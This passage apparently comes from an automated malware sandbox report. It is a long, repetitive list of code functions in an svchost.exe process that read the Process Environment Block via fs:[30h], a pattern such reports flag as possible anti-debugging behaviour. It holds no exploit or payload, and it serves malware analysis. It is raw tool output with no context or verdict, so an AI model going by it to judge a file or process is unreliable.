            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03DAE1D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03DAE1D0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03DF61C3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03D601F8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03DB019F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03D2A197 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03D70185 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03DEC188 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03DD4180 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03D2C156 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03DC8158 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03D36154 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03DC4144 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03DC4144 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03DDA118 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03DDA118 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03DF0115 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03DDE10E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03DDE10E mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03D60124 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03DB20DE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03D2C0F0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03D720F0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03D2A0E3 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03D380E9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03DB60E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03D3208A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03DF60B8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03DF60B8 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03DC80A8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03D32050 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03DB6050 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03D5C073 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03D4E016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03DB4000 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03DD2000 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03DC6030 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03D2A020 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03D2C020 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03D3C7C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03DB07C3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03D347FB mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03D527ED mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03DBE7E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03DD678E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03D307AF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03DE47A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03D30750 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03DBE75D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03D72750 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03DB4755 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03D6674D mov esi, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03D6674D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03D38770 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03D40770 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03D30710 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03D60710 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03D6C700 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03D6273C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03D6273C mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03DAC730 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03D6C720 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03D6A6C7 mov ebx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03D6A6C7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03DAE6F2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03DB06F1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03D34690 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03D666B0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03D6C6A6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03D4C640 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03D62674 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03DF866E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03D6A660 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03D72619 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03DAE609 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03D4E627 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03D66620 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03D68620 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03D3262C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03D365D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D6A5D0 mov eax, dword ptr fs:[00000030h]2_2_03D6A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D6A5D0 mov eax, dword ptr fs:[00000030h]2_2_03D6A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D6E5CF mov eax, dword ptr fs:[00000030h]2_2_03D6E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D6E5CF mov eax, dword ptr fs:[00000030h]2_2_03D6E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03D5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03D5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03D5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03D5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03D5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03D5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03D5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03D5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D325E0 mov eax, dword ptr fs:[00000030h]2_2_03D325E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D6C5ED mov eax, dword ptr fs:[00000030h]2_2_03D6C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D6C5ED mov eax, dword ptr fs:[00000030h]2_2_03D6C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D6E59C mov eax, dword ptr fs:[00000030h]2_2_03D6E59C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D32582 mov eax, dword ptr fs:[00000030h]2_2_03D32582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D32582 mov ecx, dword ptr fs:[00000030h]2_2_03D32582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D64588 mov eax, dword ptr fs:[00000030h]2_2_03D64588
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D545B1 mov eax, dword ptr fs:[00000030h]2_2_03D545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D545B1 mov eax, dword ptr fs:[00000030h]2_2_03D545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DB05A7 mov eax, dword ptr fs:[00000030h]2_2_03DB05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DB05A7 mov eax, dword ptr fs:[00000030h]2_2_03DB05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DB05A7 mov eax, dword ptr fs:[00000030h]2_2_03DB05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D38550 mov eax, dword ptr fs:[00000030h]2_2_03D38550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D38550 mov eax, dword ptr fs:[00000030h]2_2_03D38550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D6656A mov eax, dword ptr fs:[00000030h]2_2_03D6656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D6656A mov eax, dword ptr fs:[00000030h]2_2_03D6656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D6656A mov eax, dword ptr fs:[00000030h]2_2_03D6656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DC6500 mov eax, dword ptr fs:[00000030h]2_2_03DC6500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03E04500 mov eax, dword ptr fs:[00000030h]2_2_03E04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03E04500 mov eax, dword ptr fs:[00000030h]2_2_03E04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03E04500 mov eax, dword ptr fs:[00000030h]2_2_03E04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03E04500 mov eax, dword ptr fs:[00000030h]2_2_03E04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03E04500 mov eax, dword ptr fs:[00000030h]2_2_03E04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03E04500 mov eax, dword ptr fs:[00000030h]2_2_03E04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03E04500 mov eax, dword ptr fs:[00000030h]2_2_03E04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D40535 mov eax, dword ptr fs:[00000030h]2_2_03D40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D40535 mov eax, dword ptr fs:[00000030h]2_2_03D40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D40535 mov eax, dword ptr fs:[00000030h]2_2_03D40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D40535 mov eax, dword ptr fs:[00000030h]2_2_03D40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D40535 mov eax, dword ptr fs:[00000030h]2_2_03D40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D40535 mov eax, dword ptr fs:[00000030h]2_2_03D40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D5E53E mov eax, dword ptr fs:[00000030h]2_2_03D5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D5E53E mov eax, dword ptr fs:[00000030h]2_2_03D5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D5E53E mov eax, dword ptr fs:[00000030h]2_2_03D5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D5E53E mov eax, dword ptr fs:[00000030h]2_2_03D5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D5E53E mov eax, dword ptr fs:[00000030h]2_2_03D5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D304E5 mov ecx, dword ptr fs:[00000030h]2_2_03D304E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DEA49A mov eax, dword ptr fs:[00000030h]2_2_03DEA49A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D644B0 mov ecx, dword ptr fs:[00000030h]2_2_03D644B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DBA4B0 mov eax, dword ptr fs:[00000030h]2_2_03DBA4B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D364AB mov eax, dword ptr fs:[00000030h]2_2_03D364AB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DEA456 mov eax, dword ptr fs:[00000030h]2_2_03DEA456
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D2645D mov eax, dword ptr fs:[00000030h]2_2_03D2645D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D5245A mov eax, dword ptr fs:[00000030h]2_2_03D5245A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D6E443 mov eax, dword ptr fs:[00000030h]2_2_03D6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D6E443 mov eax, dword ptr fs:[00000030h]2_2_03D6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D6E443 mov eax, dword ptr fs:[00000030h]2_2_03D6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D6E443 mov eax, dword ptr fs:[00000030h]2_2_03D6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D6E443 mov eax, dword ptr fs:[00000030h]2_2_03D6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D6E443 mov eax, dword ptr fs:[00000030h]2_2_03D6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D6E443 mov eax, dword ptr fs:[00000030h]2_2_03D6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D6E443 mov eax, dword ptr fs:[00000030h]2_2_03D6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D5A470 mov eax, dword ptr fs:[00000030h]2_2_03D5A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D5A470 mov eax, dword ptr fs:[00000030h]2_2_03D5A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D5A470 mov eax, dword ptr fs:[00000030h]2_2_03D5A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DBC460 mov ecx, dword ptr fs:[00000030h]2_2_03DBC460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D68402 mov eax, dword ptr fs:[00000030h]2_2_03D68402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D68402 mov eax, dword ptr fs:[00000030h]2_2_03D68402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D68402 mov eax, dword ptr fs:[00000030h]2_2_03D68402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D6A430 mov eax, dword ptr fs:[00000030h]2_2_03D6A430
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D2E420 mov eax, dword ptr fs:[00000030h]2_2_03D2E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D2E420 mov eax, dword ptr fs:[00000030h]2_2_03D2E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D2E420 mov eax, dword ptr fs:[00000030h]2_2_03D2E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D2C427 mov eax, dword ptr fs:[00000030h]2_2_03D2C427
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DB6420 mov eax, dword ptr fs:[00000030h]2_2_03DB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DB6420 mov eax, dword ptr fs:[00000030h]2_2_03DB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DB6420 mov eax, dword ptr fs:[00000030h]2_2_03DB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DB6420 mov eax, dword ptr fs:[00000030h]2_2_03DB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DB6420 mov eax, dword ptr fs:[00000030h]2_2_03DB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DB6420 mov eax, dword ptr fs:[00000030h]2_2_03DB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DB6420 mov eax, dword ptr fs:[00000030h]2_2_03DB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DDEBD0 mov eax, dword ptr fs:[00000030h]2_2_03DDEBD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D50BCB mov eax, dword ptr fs:[00000030h]2_2_03D50BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D50BCB mov eax, dword ptr fs:[00000030h]2_2_03D50BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D50BCB mov eax, dword ptr fs:[00000030h]2_2_03D50BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D30BCD mov eax, dword ptr fs:[00000030h]2_2_03D30BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D30BCD mov eax, dword ptr fs:[00000030h]2_2_03D30BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D30BCD mov eax, dword ptr fs:[00000030h]2_2_03D30BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D38BF0 mov eax, dword ptr fs:[00000030h]2_2_03D38BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D38BF0 mov eax, dword ptr fs:[00000030h]2_2_03D38BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D38BF0 mov eax, dword ptr fs:[00000030h]2_2_03D38BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D5EBFC mov eax, dword ptr fs:[00000030h]2_2_03D5EBFC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DBCBF0 mov eax, dword ptr fs:[00000030h]2_2_03DBCBF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D40BBE mov eax, dword ptr fs:[00000030h]2_2_03D40BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D40BBE mov eax, dword ptr fs:[00000030h]2_2_03D40BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DE4BB0 mov eax, dword ptr fs:[00000030h]2_2_03DE4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DE4BB0 mov eax, dword ptr fs:[00000030h]2_2_03DE4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DDEB50 mov eax, dword ptr fs:[00000030h]2_2_03DDEB50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DE4B4B mov eax, dword ptr fs:[00000030h]2_2_03DE4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DE4B4B mov eax, dword ptr fs:[00000030h]2_2_03DE4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DC6B40 mov eax, dword ptr fs:[00000030h]2_2_03DC6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DC6B40 mov eax, dword ptr fs:[00000030h]2_2_03DC6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DFAB40 mov eax, dword ptr fs:[00000030h]2_2_03DFAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DD8B42 mov eax, dword ptr fs:[00000030h]2_2_03DD8B42
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D2CB7E mov eax, dword ptr fs:[00000030h]2_2_03D2CB7E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03E02B57 mov eax, dword ptr fs:[00000030h]2_2_03E02B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03E02B57 mov eax, dword ptr fs:[00000030h]2_2_03E02B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03E02B57 mov eax, dword ptr fs:[00000030h]2_2_03E02B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03E02B57 mov eax, dword ptr fs:[00000030h]2_2_03E02B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DAEB1D mov eax, dword ptr fs:[00000030h]2_2_03DAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DAEB1D mov eax, dword ptr fs:[00000030h]2_2_03DAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DAEB1D mov eax, dword ptr fs:[00000030h]2_2_03DAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DAEB1D mov eax, dword ptr fs:[00000030h]2_2_03DAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DAEB1D mov eax, dword ptr fs:[00000030h]2_2_03DAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DAEB1D mov eax, dword ptr fs:[00000030h]2_2_03DAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DAEB1D mov eax, dword ptr fs:[00000030h]2_2_03DAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DAEB1D mov eax, dword ptr fs:[00000030h]2_2_03DAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DAEB1D mov eax, dword ptr fs:[00000030h]2_2_03DAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D5EB20 mov eax, dword ptr fs:[00000030h]2_2_03D5EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D5EB20 mov eax, dword ptr fs:[00000030h]2_2_03D5EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DF8B28 mov eax, dword ptr fs:[00000030h]2_2_03DF8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DF8B28 mov eax, dword ptr fs:[00000030h]2_2_03DF8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D30AD0 mov eax, dword ptr fs:[00000030h]2_2_03D30AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D64AD0 mov eax, dword ptr fs:[00000030h]2_2_03D64AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D64AD0 mov eax, dword ptr fs:[00000030h]2_2_03D64AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D86ACC mov eax, dword ptr fs:[00000030h]2_2_03D86ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D86ACC mov eax, dword ptr fs:[00000030h]2_2_03D86ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D86ACC mov eax, dword ptr fs:[00000030h]2_2_03D86ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D6AAEE mov eax, dword ptr fs:[00000030h]2_2_03D6AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D6AAEE mov eax, dword ptr fs:[00000030h]2_2_03D6AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D68A90 mov edx, dword ptr fs:[00000030h]2_2_03D68A90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D3EA80 mov eax, dword ptr fs:[00000030h]2_2_03D3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D3EA80 mov eax, dword ptr fs:[00000030h]2_2_03D3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D3EA80 mov eax, dword ptr fs:[00000030h]2_2_03D3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D3EA80 mov eax, dword ptr fs:[00000030h]2_2_03D3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D3EA80 mov eax, dword ptr fs:[00000030h]2_2_03D3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D3EA80 mov eax, dword ptr fs:[00000030h]2_2_03D3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D3EA80 mov eax, dword ptr fs:[00000030h]2_2_03D3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D3EA80 mov eax, dword ptr fs:[00000030h]2_2_03D3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D3EA80 mov eax, dword ptr fs:[00000030h]2_2_03D3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03E04A80 mov eax, dword ptr fs:[00000030h]2_2_03E04A80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D38AA0 mov eax, dword ptr fs:[00000030h]2_2_03D38AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D38AA0 mov eax, dword ptr fs:[00000030h]2_2_03D38AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D86AA4 mov eax, dword ptr fs:[00000030h]2_2_03D86AA4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D36A50 mov eax, dword ptr fs:[00000030h]2_2_03D36A50
